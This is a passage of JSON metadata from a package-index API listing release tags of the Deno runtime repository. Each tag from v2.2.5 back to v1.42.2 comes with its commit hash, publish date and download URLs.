kg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/